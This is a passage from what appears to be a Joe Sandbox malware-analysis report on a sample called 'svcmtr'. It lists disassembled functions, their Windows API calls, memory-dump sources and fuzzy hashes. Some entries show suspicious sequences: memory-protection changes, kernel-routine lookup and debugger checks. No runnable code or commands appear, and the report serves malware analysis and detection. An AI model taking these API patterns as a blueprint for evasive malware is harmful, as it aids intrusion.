                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction ID: 7d799e208526352e69521f93076fe8d06240286659df5f408eabf4347344cfde
                                                                                                                            • Opcode Fuzzy Hash: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction Fuzzy Hash: 17E0C2B2730A23D5DB2C22A8CD6B2BCA456EBD0301F5CE81A4587DC193DAE441809060
                                                                                                                            Function 00428581 Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2056685748-0
                                                                                                                            • Opcode ID: 8681d032ff11c242d48313d070cd23993bb6e7951d600600577439931ece4efd
                                                                                                                            • Instruction ID: e01de4f2985e6a4c25230675727b24bf77244cde49041224cafbe23f2315b811
                                                                                                                            • Opcode Fuzzy Hash: 8681d032ff11c242d48313d070cd23993bb6e7951d600600577439931ece4efd
                                                                                                                            • Instruction Fuzzy Hash: 06E09230145120EECA250B20F0452357BA09F5171AFB846CFD590891E3CB3E94C2DA18
                                                                                                                            Function 0041A650 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __strftime_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2461563286-0
                                                                                                                            • Opcode ID: d566234ce0f229fd2afecf0ae5b9b97420a5a446b133c6a933e25d65cd1a959e
                                                                                                                            • Instruction ID: 080683f2913065e606cd5507846926a5ca4699838dd0e9534521afcedec9a1ee
                                                                                                                            • Opcode Fuzzy Hash: d566234ce0f229fd2afecf0ae5b9b97420a5a446b133c6a933e25d65cd1a959e
                                                                                                                            • Instruction Fuzzy Hash: D7C012F150020D7BDB00DE88DC46EA7339CA784604F448019B90C87241E570F91487A4
                                                                                                                            Function 002321D6 Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction ID: 61f03ac7120b258d402ed533f7e17fa01bffeb4694d11a0f29e16d2dcdd01fc4
                                                                                                                            • Opcode Fuzzy Hash: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction Fuzzy Hash: 3CB092A273092244EE1C12B09D2B7E4804CA6E4B16F58A8564593C8497E8D882805040
                                                                                                                            Function 00424733 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __wcsupr_s_l.LIBCMT ref: 00424740
                                                                                                                              • Part of subcall function 00424700: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042470E
                                                                                                                              • Part of subcall function 00424700: _wcslwr_s_l_stat.LIBCMT ref: 0042471D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___wcsupr_s_l_wcslwr_s_l_stat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1994797442-0
                                                                                                                            • Opcode ID: 734d5703a4acecb0aa3ca55fef060b03c460ece9851914b3e66cd2688762005e
                                                                                                                            • Instruction ID: fde2983c40f2c64e24e8fcac7fd46db8363c52f67f45cf2982bc5af2ffebac7c
                                                                                                                            • Opcode Fuzzy Hash: 734d5703a4acecb0aa3ca55fef060b03c460ece9851914b3e66cd2688762005e
                                                                                                                            • Instruction Fuzzy Hash: DCC0927654024C77CF112A82FC02F4A3F1ADBC1778F558021FA2C09162AA73AA619A89
                                                                                                                            Function 004273C6 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEncodePointer.NTDLL(00000000,0042CCDA,0043B8B8,00000314,00000000,?,?,?,?,?,0042934B,0043B8B8,Microsoft Visual C++ Runtime Library,00012010), ref: 004273C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2118026453-0
                                                                                                                            • Opcode ID: 5ffc722a3da3fb8b01834c4096c76897cc306fd453106a62c14b41acc699e867
                                                                                                                            • Instruction ID: 3ccf6682ba2a6bb29ddfb9329026e533cf3d875bcac41a81282e2e487c30c143
                                                                                                                            • Opcode Fuzzy Hash: 5ffc722a3da3fb8b01834c4096c76897cc306fd453106a62c14b41acc699e867
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Function 00231D50 Relevance: 1.4, APIs: 1, Instructions: 111COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction ID: 70b7fef99dad11ddae5798bb5e6f83cd5a92bf30e70f16b26b0f9990a38cf208
                                                                                                                            • Opcode Fuzzy Hash: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction Fuzzy Hash: A1314EF5D302399EDF1D5A64CC51F7D7A32FB90704F1882B9D807A6151DBB14D319A90
                                                                                                                            Function 00231E0F Relevance: 1.3, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction ID: c225a94fd12fe433039d9fde6172315fe83e0fb7a6822af79ad76f4c0217926d
                                                                                                                            • Opcode Fuzzy Hash: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction Fuzzy Hash: BB0149B5E3012A9AEF2D5B34CC59FBD7672FB90700F1882A9D84BE5042DB714A729E40
                                                                                                                            Function 00231E3A Relevance: 1.3, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction ID: d31bdf12b9d91aac1500cf151175c217257593f83f05e0711e82fec2d2b4caae
                                                                                                                            • Opcode Fuzzy Hash: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction Fuzzy Hash: B501F4B5D3012A9AEF294E30CC49FBD7635FB90704F1482A9D94AE2041EB310E729E80

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0041ED00 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 211registrymemorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,75DC55D0,00000000), ref: 0041ED29
                                                                                                                            • RtlGetVersion.NTDLL ref: 0041ED5A
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0041ED84
                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 0041EDB0
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0041EDCB
                                                                                                                            • LoadIconW.USER32 ref: 0041EE1D
                                                                                                                            • RegisterClassExW.USER32(?), ref: 0041EE34
                                                                                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 0041EE6A
                                                                                                                            • InterlockedExchange.KERNEL32(?,0041ECC0), ref: 0041EE83
                                                                                                                            • CreateWindowExW.USER32 ref: 0041EEA8
                                                                                                                            • GetStartupInfoW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EEFA
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\system32\,?,00000104,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EF29
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Current$ClassCreateEnvironmentExchangeExpandHandleIconInfoInformationInterlockedLoadModuleProtectQueryRegisterStartupStringsVersionVirtualWindow
                                                                                                                            • String ID: $%systemroot%\system32\$0$D
                                                                                                                            • API String ID: 1361090928-3283359705
                                                                                                                            • Opcode ID: c20773353a010fabc41fdcbc50ed731b0d34950c4257898204bd5a16da5ee9e0
                                                                                                                            • Instruction ID: 338129a709ff1bd2c0cf9b040ef69aa9b4d99304f4a8b72eeefc7f337fadd0cb
                                                                                                                            • Opcode Fuzzy Hash: c20773353a010fabc41fdcbc50ed731b0d34950c4257898204bd5a16da5ee9e0
                                                                                                                            • Instruction Fuzzy Hash: 9C71C2751043419FE724DF61DC48BAB77E8FB84701F00492EFA55C72A0DB789845CB6A
                                                                                                                            Function 0041EA80 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 109memorylibrarynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001000,00000000,00000018,?), ref: 0041EAB3
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041EAB6
                                                                                                                            • NtQuerySystemInformation.NTDLL(0000000B,00000000,00001000,?), ref: 0041EAD1
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EAE7
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EAEA
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041EB32
                                                                                                                            • _strcpy_s.LIBCMT ref: 0041EB5A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EB68
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EB6B
                                                                                                                            • LoadLibraryExA.KERNEL32(0000005C,00000000,00000001), ref: 0041EB7C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PsLookupProcessByProcessId), ref: 0041EB8E
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041EB9A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EBB6
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EBB9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeProcess$LibrarySystem$AddressAllocDirectoryInformationLoadProcQuery_strcpy_s
                                                                                                                            • String ID: PsLookupProcessByProcessId$\
                                                                                                                            • API String ID: 2503006650-1547739243
                                                                                                                            • Opcode ID: 43a0f01cdf794f41006e1963364c22ed5345e89fbe19fae2046950b1ed626966
                                                                                                                            • Instruction ID: d9b6583839900e7c546c71df0e51cb6a95a5132ca019d880cf3c400ebc5e44b3
                                                                                                                            • Opcode Fuzzy Hash: 43a0f01cdf794f41006e1963364c22ed5345e89fbe19fae2046950b1ed626966
                                                                                                                            • Instruction Fuzzy Hash: FC31E835641218ABD7209B75DC8CFEB7778FF44751F0005AAF90AD7290DBB49A84CAA8
                                                                                                                            Function 00411120 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 337COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _aullshr
                                                                                                                            • String ID: 0>C$@:C$@:C
                                                                                                                            • API String ID: 4154462305-3304788932
                                                                                                                            • Opcode ID: 1700e1b6d897883276b98ea76e93d2e7ee8c6925a21909d7da617a8eaf8321bf
                                                                                                                            • Instruction ID: 6f33c4bb07da5afcf50d228bf944658890b72a782cf23c8074268a3509e2577d
                                                                                                                            • Opcode Fuzzy Hash: 1700e1b6d897883276b98ea76e93d2e7ee8c6925a21909d7da617a8eaf8321bf
                                                                                                                            • Instruction Fuzzy Hash: B9C17BB1A087009FD324DF2AD841A6BB7E5BFC9714F508A2EF699C7350E774D8418B86
                                                                                                                            Function 0041AEF9 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 242COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: ....................$P6C$P6C
                                                                                                                            • API String ID: 2102423945-367312072
                                                                                                                            • Opcode ID: 4ae34b23a890f7ea120bdd1b8495324c2c92c09c67ee2a06793238bebba49036
                                                                                                                            • Instruction ID: c50ebbbe94665e3b61506474d11c71efd2640967613476eb690509a89d1b308a
                                                                                                                            • Opcode Fuzzy Hash: 4ae34b23a890f7ea120bdd1b8495324c2c92c09c67ee2a06793238bebba49036
                                                                                                                            • Instruction Fuzzy Hash: 31919F756083419BC714DF25D8C1A9BBBE5FFC8344F008A2EF99987201D775E84ACB96
                                                                                                                            Function 00423EBB Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004255F2
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00425607
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00431404), ref: 00425612
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0042562E
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00425635
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 03755ccaf70ad708b6f4fab71e6332518628caabaa0e7df61347e8e180b5b247
                                                                                                                            • Instruction ID: 6bb5de789a321063787ca96de7b9cd1f4631822c0065670583fbb202f00acfec
                                                                                                                            • Opcode Fuzzy Hash: 03755ccaf70ad708b6f4fab71e6332518628caabaa0e7df61347e8e180b5b247
                                                                                                                            • Instruction Fuzzy Hash: D021BCB4901348AFD700DF29F98AB443BB0FB18315F50713AEA0987672E7B459858F8E
                                                                                                                            Function 0041AAB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 250COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: P6C$gfff
                                                                                                                            • API String ID: 2102423945-1005010341
                                                                                                                            • Opcode ID: 3a449d1c1157dbdbdf29ec6951557a5515a362dce761f230ceae7394c646bca1
                                                                                                                            • Instruction ID: 6c3f72de7210157f29cf342e4d814f1a2669bf009d892c6013dbe885ee46713a
                                                                                                                            • Opcode Fuzzy Hash: 3a449d1c1157dbdbdf29ec6951557a5515a362dce761f230ceae7394c646bca1
                                                                                                                            • Instruction Fuzzy Hash: 1491D371A097418BC704CF69DC80AABBBE9AFC4310F044A2EF985D7251E778D954CB9B
                                                                                                                            Function 004276BF Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004253FE), ref: 004276C7
                                                                                                                            • __mtterm.LIBCMT ref: 004276D3
                                                                                                                              • Part of subcall function 0042740C: DecodePointer.KERNEL32(00000004,00427835,?,004253FE), ref: 0042741D
                                                                                                                              • Part of subcall function 0042740C: TlsFree.KERNEL32(0000001D,00427835,?,004253FE), ref: 00427437
                                                                                                                              • Part of subcall function 0042740C: DeleteCriticalSection.KERNEL32(00000000,00000000,774EB15F,?,00427835,?,004253FE), ref: 0042A3A8
                                                                                                                              • Part of subcall function 0042740C: _free.LIBCMT ref: 0042A3AB
                                                                                                                              • Part of subcall function 0042740C: DeleteCriticalSection.KERNEL32(0000001D,774EB15F,?,00427835,?,004253FE), ref: 0042A3D2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,004253FE), ref: 004276E9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,004253FE), ref: 004276F6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,004253FE), ref: 00427703
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree,?,004253FE), ref: 00427710
                                                                                                                            • TlsAlloc.KERNEL32(?,004253FE), ref: 00427760
                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,004253FE), ref: 0042777B
                                                                                                                            • __init_pointers.LIBCMT ref: 00427785
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 00427796
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277A3
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277B0
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277BD
                                                                                                                            • DecodePointer.KERNEL32(00427590,?,004253FE), ref: 004277DE
                                                                                                                            • __calloc_crt.LIBCMT ref: 004277F3
                                                                                                                            • DecodePointer.KERNEL32(00000000,?,004253FE), ref: 0042780D
                                                                                                                            • GetCurrentThreadId.KERNEL32(?,004253FE), ref: 0042781F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
